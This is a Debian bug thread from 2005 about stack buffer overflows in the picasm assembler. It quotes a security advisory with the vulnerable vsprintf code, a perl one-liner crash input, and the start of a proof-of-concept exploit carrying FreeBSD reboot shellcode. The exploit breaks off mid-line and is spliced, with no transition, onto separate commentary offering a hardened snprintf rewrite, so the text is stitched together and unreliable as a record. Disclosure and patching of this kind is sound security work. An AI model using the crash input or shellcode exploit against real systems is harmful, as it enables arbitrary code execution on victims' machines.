Bug#309982: Multiple buffer overflows in picasm

2005-05-21 Thread Torsten Werner
tags 309982 + patch
thanks

On 2005-05-21, Moritz Muehlenhoff wrote:
 FIX INFORMATION
 *
 The maintainer, Timo Rossi, has fixed the picasm packages and provided
 a new security release, picasm 1.12c.  The fixed packages are
 available from http://www.co.jyu.fi/~trossi/pic/picasm112c.tar.gz.
 
 Thanks to Timo Rossi for his cooperation in fixing the issue.

The mentioned file is actually in bzip2 format, but it can be easily
recompiled with the last Debian diff for version 1.12b. I am attaching
an updated diff for version 1.12c.

Regards,
Torsten

Bug#309982: Multiple buffer overflows in picasm

2005-05-20 Thread Moritz Muehlenhoff
Package: picasm
Severity: grave
Tags: security
Justification: user security hole

Multiple buffer overflows in picasm's code for generating error messages
have been found that can be exploited through crafted source code with
overly long preprocessor directives. For full details please see this
advisory by Shaun Colley, for which I could not find an online reference:

Cheers,
Moritz


picasm error handling stack overflow vulnerability

Name: picasm error handling stack overflow
Versions Affected: picasm = 1.12b
Severity: Medium/High
Impact: Arbitrary code execution
Maintainer's Website: http://www.co.jyu.fi/~trossi
Author: Shaun Colley
Vendor Notified: May 7th 2005
Public Disclosure: May 20th 2005


BACKGROUND
**
picasm is a Microchip PIC16Cxx assembler, designed to run on most
UNIX-like operating systems.  picasm now extends support to several
other PICs, including the 2c508 and 12c509 devices.

picasm is available via the FreeBSD ports system as devel/picasm.  The
maintainer, Timo Rossi, also provides it on his microcontroller web
page http://www.co.jyu.fi/~trossi/pic.


DETAILS

When generating error and warning messages, picasm copies strings into
fixed length buffers without bounds checking.  Below is the
responsible code.

---
void
warning(char *fmt, ...)
{
   char outbuf[128];
   va_list args;

   err_line_ref();
   strcpy(outbuf, "Warning: ");
   va_start(args, fmt);
   /* no bound: vsprintf writes as much as fmt and args produce */
   vsprintf(outbuf+9, fmt, args); [1]

...


void
error(int lskip, char *fmt, ...)
{
   va_list args;
   char outbuf[128];

   err_line_ref();
   strcpy(outbuf, "Error: ");
   va_start(args, fmt);
   /* same unbounded write into the 128-byte stack buffer */
   vsprintf(outbuf+7, fmt, args); [2]

...

void
fatal_error(char *fmt, ...)
{
   va_list args;
   char outbuf[128];

   err_line_ref();
   strcpy(outbuf, "Fatal error: ");
   va_start(args, fmt);
   /* same unbounded write into the 128-byte stack buffer */
   vsprintf(outbuf+13, fmt, args); [3]

...
}
---

Where [1], [2] and [3], the error handling routines call vsprintf() to
copy a passed format string into a fixed length buffer.  If the 'fmt'
function argument could be controlled, a stack overflow could occur.

As the author explains in the documentation, picasm supports an
'error' directive similar to NASM's '%error' preprocessor.

 ...
 error error_message   Causes an assembly error.
 ...

An overly long error_message provided to an 'error' directive in a
source file would cause calling of error() and result in a stack
overflow as seen in [2].

If an attacker could trick a user into assembling a source file with a
malformed 'error' directive, arbitrary code could be executed with the
privileges of the user.  This could result in full system compromise.

There may be other attack vectors, such as causing picasm to generate
a long warning message, but this has not been investigated.


EXPLOITATION
**
An attacker who can convince a user to assemble a malformed source
file can execute arbitrary code with the privileges of the user.

Exploitation is straightforward.  The log below shows sample exploitation.

---
bash-3.00# echo `perl -e 'print "error " . "a"x2000'` > test.asm
bash-3.00# picasm test.asm
test.asm:1:
error 
aa
Error: 

Segmentation fault (core dumped)
bash-3.00# gdb -q -c picasm.core
Core was generated by `picasm'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) quit
bash-3.00#
---

A proof-of-concept exploit has been written and successfully tested
using the picasm (v1.12b) port on FreeBSD 5.3-RELEASE.  The exploit
crafts a file with a malformed 'error' directive which causes
execution to be directed to reboot() shellcode upon overflow.

---
/* picasm_exploit.c - by Shaun Colley shaun rsc cx
 *
 * This code generates a picasm source file with a malformed 'error' directive,
 * which exploits a stack overflow vulnerability in picasm's error printing
 * routines.  The file generated by this exploit will only cause execution
 * of FreeBSD 'reboot()' shellcode.  Exploit has been tested on
 * FreeBSD 5.3-RELEASE.
 * Return address into shellcode may need changing on other operating system
 * versions.  Other shellcodes can potentially be used instead of the
 * one below.
 *
 * A fix has been provided by picasm's maintainer.  The fixed packages can be
 * found at http://www.co.jyu.fi/~trossi/pic/picasm112c.tar.gz.
 */

#include <stdio.h>
#include <stdlib.h>

/* FreeBSD reboot shellcode by zillion
 * zillion safemode org */
char shellcode[] =
  "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";

int main(int argc, char *argv[]) {

  if(argc < 2) {
    printf("syntax: %s outfile\n", argv[0]);
    return 1;
  }

  char buf[144];

  /* FreeBSD
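The advisory's DETAILS section shows the defect: vsprintf() writes into a 128-byte stack buffer with no bound, and the text of an 'error' directive reaches it. The block below is an added example of the corrected pattern; it is not picasm's code and not the change Timo Rossi shipped in 1.12c. It keeps the advisory's "Error: " prefix and 128-byte buffer size, but every write goes through snprintf()/vsnprintf() with the remaining size, the return value reports truncation the way snprintf does, and the directive text is passed as a "%s" argument rather than as the format string. The names format_diag, safe_error, report_error_directive and the guarded_buf struct are mine, and the 2000-character input is constructed to mirror the advisory's test.

```c
/* Added example, not picasm's code: a bounded replacement for the
 * warning()/error()/fatal_error() pattern quoted in the advisory. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define OUTBUF_SIZE 128          /* same fixed size as the advisory's outbuf[128] */

/* Write "<prefix>: <formatted message>" into out[outsz] without ever writing past
 * the end.  Returns the length the untruncated message would have had (snprintf
 * semantics), so a return value >= outsz means the text was cut off; -1 on error. */
static int format_diag(char *out, size_t outsz, const char *prefix,
                       const char *fmt, va_list args)
{
    if (out == NULL || outsz == 0)
        return -1;
    int n = snprintf(out, outsz, "%s: ", prefix);
    if (n < 0) {
        out[0] = '\0';
        return -1;
    }
    /* If the prefix alone filled the buffer, vsnprintf gets a zero-length window. */
    size_t used = (size_t)n < outsz ? (size_t)n : outsz - 1;
    int m = vsnprintf(out + used, outsz - used, fmt, args);
    if (m < 0)
        return -1;
    return n + m;
}

/* Hardened counterpart of the advisory's error(): same prefix, same buffer size,
 * but the bound is enforced and truncation is reported to the caller. */
int safe_error(char *out, size_t outsz, const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    int r = format_diag(out, outsz, "Error", fmt, args);
    va_end(args);
    return r;
}

/* Handler for the 'error' directive (hypothetical name): the text taken from the
 * source file is passed as a "%s" argument, never as fmt, so '%' sequences in it
 * are printed literally instead of being interpreted as format directives. */
int report_error_directive(char *out, size_t outsz, const char *user_msg)
{
    return safe_error(out, outsz, "%s", user_msg);
}

/* A buffer followed by a guard region lets the demos detect any overwrite. */
struct guarded_buf {
    char outbuf[OUTBUF_SIZE];
    char guard[16];
};

static int guard_intact(const struct guarded_buf *g)
{
    for (size_t i = 0; i < sizeof g->guard; i++)
        if (g->guard[i] != 'G')
            return 0;
    return 1;
}

/* Constructed input modelled on the advisory's test: 2000 'a' characters.
 * Returns 1 when the output is clipped to the buffer, keeps its prefix, the full
 * length is reported, and the guard bytes after the buffer are untouched. */
int demo_long_directive(void)
{
    struct guarded_buf g;
    char msg[2001];
    memset(msg, 'a', 2000);
    msg[2000] = '\0';
    memset(g.guard, 'G', sizeof g.guard);

    int r = report_error_directive(g.outbuf, sizeof g.outbuf, msg);

    return r == 7 + 2000
        && strlen(g.outbuf) == OUTBUF_SIZE - 1
        && strncmp(g.outbuf, "Error: ", 7) == 0
        && guard_intact(&g);
}

/* Constructed input containing format directives; they must come out literally. */
int demo_percent_directive(void)
{
    struct guarded_buf g;
    memset(g.guard, 'G', sizeof g.guard);
    int r = report_error_directive(g.outbuf, sizeof g.outbuf, "%x %s %n");
    return r == 15 && strcmp(g.outbuf, "Error: %x %s %n") == 0 && guard_intact(&g);
}

/* Small buffer: the caller can tell from the return value that text was lost. */
int demo_truncation_reported(void)
{
    char small[16];
    int r = safe_error(small, sizeof small, "%s", "hello world");
    return r == 18 && strcmp(small, "Error: hello wo") == 0;
}

int main(void)
{
    printf("long directive bounded:    %s\n", demo_long_directive() ? "yes" : "no");
    printf("percent directive literal: %s\n", demo_percent_directive() ? "yes" : "no");
    printf("truncation reported:       %s\n", demo_truncation_reported() ? "yes" : "no");
    return 0;
}
```

The two changes are independent and both matter: vsnprintf() alone stops the stack write, but a diagnostic routine that still receives attacker text as fmt would keep honouring '%' directives, so the directive handler hands the text over as an argument. Reporting the would-be length lets a caller log that a message was clipped instead of silently dropping the tail.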